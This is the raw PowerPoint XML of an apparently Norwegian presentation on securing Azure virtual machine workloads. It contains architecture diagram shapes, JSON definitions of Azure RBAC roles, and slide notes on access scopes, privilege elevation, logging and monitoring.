              <a:srgbClr val="0A1B3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75924FE1-0745-4C0E-840A-8078BE47A8D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8089012" y="3276052"/>
            <a:ext cx="2673754" cy="244724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417340E-6A84-4681-AA13-C25F007C7113}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8260189" y="2865601"/>
            <a:ext cx="38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Azure infrastruktur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18A1D-B536-47E7-B475-ECF3D21AF3B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="3585236"/>
            <a:ext cx="2359632" cy="874369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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4E2569-7484-41FF-81E4-510AA34261FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="4553140"/>
            <a:ext cx="2359632" cy="87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0A1B3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bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Physical Server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351C69F7-93D7-4C33-861C-7B024A8E1B69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9082718" y="3835657"/>
            <a:ext cx="1281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Storage Disk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle: Rounded Corners 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0861FCD3-E4A2-444E-85CE-06AA625AE3E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871422" y="3290305"/>
            <a:ext cx="2397730" cy="244724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3F5B80-30D1-41E7-8F0E-44E6A7AB0FFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5034638" y="3585237"/>
            <a:ext cx="2096366" cy="888622"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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5" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B30A64B-0DC9-4B8C-A8C4-EBE3358EA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160" y="3668929"/>
            <a:ext cx="704850" cy="6477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49E9565-3950-4636-BDEB-3498A045E31C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5034638" y="4567393"/>
            <a:ext cx="2116036" cy="87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0A1B3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bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Physical Server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kstSylinder 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F2C85F-46F5-4358-B51B-CBA1857D4B8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6077476" y="3803864"/>
            <a:ext cx="1072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VM01</a:t>
            </a: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74A1B65D-0F12-4D71-80E1-5FADE9E50FF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5057594" y="2866696"/>
            <a:ext cx="38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Azure infrastruktur</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E158FCD-8673-44B5-A627-6255BC0A2663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6098081" y="5939913"/>
            <a:ext cx="38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Availability Zone #1 – Region X</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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5616A01-783C-4F90-8235-E5042A533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669" y="3768610"/>
            <a:ext cx="552450" cy="5334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BA21D34-C86F-4E96-B660-5FD474CE9CED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522861" y="1434092"/>
            <a:ext cx="2529618" cy="506539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure Resource Manager (RDFE)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0D6692-E034-44D9-A69F-614D8F348149}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6609074" y="1435191"/>
            <a:ext cx="2529618" cy="506539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure Fabric Controller (Service Fabric)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A35627-4C78-4DB3-A90E-7E9A1B6CDDFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8044261" y="2105091"/>
            <a:ext cx="2529618" cy="581095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft.Storage RP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112348-3B8A-49EF-993D-420F43E18649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5019285" y="2099609"/>
            <a:ext cx="2529618" cy="581095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft.Compute RP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87724A-1B33-4B32-9604-6AA7D0F997E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9518969" y="5132262"/>
            <a:ext cx="1075745" cy="301511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Fabric Agent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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DCE6F-056F-4BDE-A12D-57038FB4B688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6072975" y="5139936"/>
            <a:ext cx="1075745" cy="301511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Fabric Agent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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5287DA4-8BA6-4FF4-9B35-AA87D0266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177" y="284552"/>
            <a:ext cx="1336723" cy="1045386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1581CF2-1143-45C3-8711-9C6FEC2F0DCA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052479" y="1687362"/>
            <a:ext cx="2556595" cy="10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75CEFB-D735-4E8C-9B23-0FB1AEEB6A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684156" y="2749883"/>
            <a:ext cx="405230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{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"Name"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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"Virtual Machine Operator"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,</a:t>
            </a:r>
          </a:p>
          <a:p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1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"Id"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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"88888888-8888-8888-8888-888888888888"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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>IsCustom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="07704A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>true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,</a:t>
            </a:r>
          </a:p>
          <a:p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1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"Description"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:</a:t>
            </a:r>
          </a:p>
          <a:p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1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"Actions"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: [</a:t>
            </a:r>
          </a:p>
          <a:p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1400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sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>Microsoft.Storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>/*/read"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,</a:t>
            </a:r>
          </a:p>
          <a:p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1400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sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>Microsoft.Network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>/*/read"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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="14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400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sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>Microsoft.Compute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>/*/read"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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>NotActions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"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: [],</a:t>
            </a:r>
          </a:p>
          <a:p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1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>DataActions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"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: [],</a:t>
            </a:r>
          </a:p>
          <a:p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1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>NotDataActions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"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: [],</a:t>
            </a:r>
          </a:p>
          <a:p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1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>AssignableScopes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0451A5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"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: [ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"/subscriptions/{subscriptionId1}"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sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>"/subscriptions/{subscriptionId2}"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FMono-Regular"/>
              </a:rPr>
              <a:t>,] }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400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E0C3CC2-AAC5-44A6-BD50-A4C39D5DCD08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2578740" y="1980104"/>
            <a:ext cx="427597" cy="756518"/>
          </a:xfrm>
          <a:prstGeom prst="down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7E3CE4-3B25-4275-B5A6-64F0ACCC9FF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7137583" y="3723382"/>
            <a:ext cx="1138066" cy="552587"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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06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4D80DA-ECE0-4461-955E-6BD2D3B70227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1503613" y="212749"/>
            <a:ext cx="9551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b="1" dirty="0"/>
              <a:t>Azure Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b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AC413AF-CB46-41C3-A839-245552650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529" y="488951"/>
            <a:ext cx="4102437" cy="6000213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Access is managed against Azure Resource Providers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Operations include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" dirty="0"/>
              <a:t>Read/write/action/delete/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Access can be defined on different levels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" dirty="0"/>
              <a:t>Management Group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" dirty="0"/>
              <a:t>Subscription</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" dirty="0"/>
              <a:t>Resource Group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nb-NO" sz="1900" dirty="0"/>
              <a:t>Ressurs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>Remember Global Admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t> User Access Administrator</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="1" dirty="0"/>
              <a:t>PIM, Access Packages or CloudKnox for elevation of access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97D5B-0DBA-498B-9ABD-138C1D9D7BE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4064000" y="241300"/>
            <a:ext cx="1110615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roleName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"Virtual Machine Contributor"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"actions"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Microsoft.Authorization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/*/read"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Microsoft.Compute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availabilitySets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/*"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Microsoft.Compute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/locations/*"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Microsoft.Compute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virtualMachines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/*"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Microsoft.Compute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/disks/write"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Microsoft.Compute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/disks/delete"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Microsoft.DevTestLab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/schedules/*"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Microsoft.Insights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alertRules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/*"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Microsoft.Network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applicationGateways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backendAddressPools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/join/action"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Microsoft.Network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loadBalancers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backendAddressPools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/join/action"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Microsoft.Network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loadBalancers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inboundNatPools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/join/action"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Microsoft.Network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loadBalancers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inboundNatRules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/join/action"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Microsoft.Network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loadBalancers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/probes/join/action"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Microsoft.Network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loadBalancers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/read"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Microsoft.Network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/locations/*"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Microsoft.Network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networkInterfaces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/*"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Microsoft.Network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networkSecurityGroups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/join/action"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Microsoft.Network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networkSecurityGroups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/read"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Microsoft.Network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publicIPAddresses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/join/action"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Microsoft.Network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publicIPAddresses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/read"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Microsoft.Network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virtualNetworks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/read"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Microsoft.Network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virtualNetworks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/subnets/join/action"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Microsoft.RecoveryServices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/locations/*"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Microsoft.RecoveryServices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/Vaults/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backupFabrics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backupProtectionIntent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/write"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Microsoft.RecoveryServices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/Vaults/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backupFabrics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protectionContainers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protectedItems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/*/read"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Microsoft.RecoveryServices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/Vaults/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backupFabrics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protectionContainers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protectedItems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/read"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Microsoft.RecoveryServices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/Vaults/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backupFabrics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protectionContainers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protectedItems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/write"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Microsoft.RecoveryServices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/Vaults/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backupPolicies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/read"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Microsoft.RecoveryServices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/Vaults/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backupPolicies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/write"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Microsoft.RecoveryServices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/Vaults/write"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Microsoft.ResourceHealth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availabilityStatuses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/read"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Microsoft.Resources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/deployments/*"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Microsoft.Resources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/subscriptions/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resourceGroups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/read"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Microsoft.SerialConsole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serialPorts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/connect/action"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Microsoft.SqlVirtualMachine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/*"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Microsoft.Storage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storageAccounts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listKeys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/action"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Microsoft.Storage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storageAccounts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/read"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Microsoft.Support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/*"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8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68097CB-AD39-43B1-A0C9-BDEB2D0BB0AE}" vid="{408056D8-DF55-4203-A651-0BE640DC058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68097CB-AD39-43B1-A0C9-BDEB2D0BB0AE}" vid="{3730D0B0-C2B5-48BC-89F8-11B30864A37F}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme3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7F7341B06EFC41B56229C9426A4853" ma:contentTypeVersion="10" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="f8b98b28424d591a9b06235b5badcf26">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="185832c1-a361-4be1-b883-bb7893c6cdc9" xmlns:ns4="b2d2f379-e54e-4947-9c46-21371fd54172" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="6b3b11927ca7153fd40e3186807f95be" ns3:_="" ns4:_="">
    <xsd:import namespace="185832c1-a361-4be1-b883-bb7893c6cdc9"/>
    <xsd:import namespace="b2d2f379-e54e-4947-9c46-21371fd541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832c1-a361-4be1-b883-bb7893c6cd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d2f379-e54e-4947-9c46-21371fd541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8A8672-6674-4853-AD30-686C6DAB0D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FB561D-29A6-4C68-831F-44126D9DBA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832c1-a361-4be1-b883-bb7893c6cdc9"/>
    <ds:schemaRef ds:uri="b2d2f379-e54e-4947-9c46-21371fd541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C0E2D5-3427-4C37-AFBA-E29A99572154}">
  <ds:schemaRefs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b2d2f379-e54e-4947-9c46-21371fd54172"/>
    <ds:schemaRef ds:uri="185832c1-a361-4be1-b883-bb7893c6cdc9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MSUGN_Template</Template>
  <TotalTime>2090</TotalTime>
  <Words>3062</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>672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Segoe UI Semibold</vt:lpstr>
      <vt:lpstr>SFMono-Regular</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Custom Design</vt:lpstr>
      <vt:lpstr>Metropolitan</vt:lpstr>
      <vt:lpstr>Securing Virtual Machine Workloads in Azure</vt:lpstr>
      <vt:lpstr>Who am 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Logs and log sources</vt:lpstr>
      <vt:lpstr>Logs and log sources</vt:lpstr>
      <vt:lpstr>Logging and Monitorering in Azure</vt:lpstr>
      <vt:lpstr>How to see the full picture?</vt:lpstr>
      <vt:lpstr>Log Analytics and Sentinel</vt:lpstr>
      <vt:lpstr>Example Query</vt:lpstr>
      <vt:lpstr>Azure Backup</vt:lpstr>
      <vt:lpstr>Update Management</vt:lpstr>
      <vt:lpstr>AutoManage</vt:lpstr>
      <vt:lpstr>Defender for Cloud and Servers</vt:lpstr>
      <vt:lpstr>Azure Policy – Guest Configuration</vt:lpstr>
      <vt:lpstr>Network and traffic flow</vt:lpstr>
      <vt:lpstr>Azure NSG Flow Logs</vt:lpstr>
      <vt:lpstr>Who did changes to the VM?!</vt:lpstr>
      <vt:lpstr>Access to the virtual machines?</vt:lpstr>
      <vt:lpstr>Cool, so what does it cost?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Sikring av virtuelle maskiner i Azure </dc:title>
  <dc:creator>SANDBU Marius</dc:creator>
  <cp:lastModifiedBy>SANDBU Marius</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-18T20:57:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-04T21:58:58Z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ae8262-b78e-4366-8929-a5d6aac95320_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
